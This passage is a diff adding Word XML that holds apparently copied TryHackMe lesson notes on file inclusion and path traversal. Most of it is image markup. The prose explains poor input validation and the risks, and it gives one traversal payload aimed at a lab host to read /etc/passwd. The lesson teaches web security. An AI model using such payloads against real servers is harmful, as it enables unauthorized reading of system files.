+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId67">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2822575"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>For example, parameters are used with Google searching, where GET requests pass user input into the search engine. https://www.google.com/search?q=TryHackMe. If you are not familiar with the topic, you can view the </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId68" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t xml:space="preserve">How </w:t>
+        </w:r>
+        <w:proofErr w:type="gramStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>The</w:t>
+        </w:r>
+        <w:proofErr w:type="gramEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t xml:space="preserve"> Web Works</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t> module to understand the concept.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Let's discuss a scenario where a user requests to access files from a webserver. First, the user sends an HTTP request to the webserver that includes a file to display. For example, if a user wants to access and display their CV within the web application, the request may look as follows, http://webapp.thm/get.php?file=userCV.pdf, where the file is the parameter and the userCV.pdf, is the required file to access.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="400E82D8" wp14:editId="5CA7DFB1">
+            <wp:extent cx="5943600" cy="2746375"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1307812051" name="Picture 78"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 294"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId69" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2746375"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Why do File inclusion vulnerabilities happen?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>File inclusion vulnerabilities are commonly found and exploited in various programming languages for web applications, such as PHP that are poorly written and implemented. The main issue of these vulnerabilities is the input validation, in which the user inputs are not sanitized or validated, and the user controls them. When the input is not validated, the user can pass any input to the function, causing the vulnerability.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t> What is the risk of File inclusion?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>By default, an attacker can leverage file inclusion vulnerabilities to leak data, such as code, credentials or other important files related to the web application or operating system. Moreover, if the attacker can write files to the server by any other means, file inclusion might be used in tandem to gain remote command execution (RCE).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>b-Deploy the VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Deploy the attached VM to follow and apply the technique as well as do the challenges. In order to access this VM, please make sure to connect to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:instrText>HYPERLINK "https://tryhackme.com/access" \t "_blank"</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>TryHackMe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> network</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> via OpenVPN or access it directly from the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>AttackBox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>, which can be launched by clicking the blue button on the top-right.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Please visit the link http://MACHINE_IP/, which will show you the following page:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31AC9586" wp14:editId="57B64070">
+            <wp:extent cx="5943600" cy="2985770"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="823237818" name="Picture 81"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 302"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId70">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2985770"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>c-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
+          <w:color w:val="F9F9FB"/>
+          <w:highlight w:val="magenta"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>Path Traversal</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Path Traversal</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Also known as Directory traversal, a web security vulnerability allows an attacker to read operating system resources, such as local files on the server running an application. The attacker exploits this vulnerability by manipulating and abusing the web application's URL to locate and access files or directories stored outside the application's root directory.&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Path traversal vulnerabilities occur when the user's input is passed to a function such as </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>file_get_contents</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in PHP. It's important to note that the function is not the main contributor to the vulnerability. Often poor input validation or filtering is the cause of the vulnerability. In PHP, you can use the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>file_get_contents</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to read the content of a file. You can find more information about the function </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId71" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>here</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>The following graph shows how a web application stores files in /var/www/app. The happy path would be the user requesting the contents of userCV.pdf from a defined path /var/www/app/CVs.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E7515D2" wp14:editId="2C20CC7E">
+            <wp:extent cx="5943600" cy="2546985"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:docPr id="685163571" name="Picture 89"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 324"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId72" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2546985"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>We can test out the URL parameter by adding payloads to see how the web application behaves. Path traversal attacks, also known as the dot-dot-slash attack, take advantage of moving the directory one step up using the double dots</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t> ..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/. If the attacker finds the entry point, which in this case </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>get.php?file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>=, then the attacker may send something as follows, http://webapp.thm/get.php?file</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>=../../../..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/etc/passwd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Suppose there isn't input validation, and instead of accessing the PDF files at /var/www/app/CVs location, the web application retrieves files from other directories, which in this case /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/passwd. Each</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t> ..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t> entry moves one directory until it reaches the root directory /. Then it changes the directory to /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>, and from there, it read the passwd file.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CD30F99" wp14:editId="1E6828EC">
+            <wp:extent cx="5943600" cy="5078095"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1498131541" name="Picture 88"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 325"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId73">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="5078095"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="780A5997" wp14:editId="0177A863">
+                <wp:extent cx="304800" cy="304800"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="1491105381" name="Rectangle 87"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr>
+                        <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="304800" cy="304800"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                        <a:extLst>
+                          <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+                            <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                              <a:solidFill>
+                                <a:srgbClr val="FFFFFF"/>
+                              </a:solidFill>
+                            </a14:hiddenFill>
+                          </a:ext>
+                          <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
+                            <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
+                              <a:solidFill>
+                                <a:srgbClr val="000000"/>
+                              </a:solidFill>
+                              <a:miter lim="800000"/>
+                              <a:headEnd/>
+                              <a:tailEnd/>
+                            </a14:hiddenLine>
+                          </a:ext>
+                        </a:extLst>
+                      </wps:spPr>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:rect w14:anchorId="6E440F3C" id="Rectangle 87" o:spid="_x0000_s1026" style="width:24pt;height:24pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                <o:lock v:ext="edit" aspectratio="t"/>
+                <w10:anchorlock/>
+              </v:rect>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>As a result, the web application sends back the file's content to the user.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="401BDD2F" wp14:editId="1CF69F95">
+            <wp:extent cx="5943600" cy="2949575"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="1822073389" name="Picture 86"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 327"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId74" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2949575"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
